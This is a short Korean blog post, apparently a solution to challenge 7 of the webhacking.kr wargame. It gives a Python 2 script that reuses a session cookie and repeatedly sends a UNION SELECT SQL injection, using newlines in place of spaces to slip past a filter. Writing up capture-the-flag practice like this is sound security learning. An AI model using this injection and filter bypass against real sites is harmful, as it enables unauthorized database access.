webhacking.kr 7번 소스코드

webhacking/sql, sql injection

webhacking.kr 7번 소스코드

qkqhxla1 2014. 8. 19. 16:13

import urllib,urllib2
# -*- coding: euc-kr -*-
form = urllib.urlencode({'id':'?????','pw':'?????'}) 
req = urllib2.Request('http://webhacking.kr',form) 
res = urllib2.urlopen(req) 
session = res.headers.get('set-cookie') #여기까지는 항상 똑같은 세션얻어오는 코드.

while 1:
    req = urllib2.Request('http://webhacking.kr/challenge/web/web-07/index.php?val=0)%0aunion%0aselect%0a(3-1') #계속 요청을 보내면서
    req.add_header('cookie',session) #내 계정정보 추가.
    res = urllib2.urlopen(req)
    reads = res.read()
    if reads.find('nice try!') == -1: #읽어온 페이지에서 nice try!가 없으면 성공
        print reads #없으면 해당 내용을 출력함.
        break

'webhacking > sql, sql injection' 카테고리의 다른 글

효율적인 블라인드 인젝션 (0)	2014.08.20
숫자 뽑아오기. (0)	2014.08.19
webhacking.kr 7번 (0)	2014.08.19
rubiya님의 문서 (2)	2014.08.15
webhacking.kr 2번 (0)	2014.08.11

현재글webhacking.kr 7번 소스코드

프로그래밍 좋아합니다. 자료 퍼가실때는 참조만 적어주세요..

Today :
Yesterday :

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

archives

webhacking.kr 7번 소스코드

'webhacking > sql, sql injection' 카테고리의 다른 글

'webhacking/sql, sql injection'의 다른글

티스토리툴바

webhacking.kr 7번 소스코드

'webhacking > sql, sql injection' 카테고리의 다른 글

'webhacking/sql, sql injection'의 다른글

관련글

티스토리툴바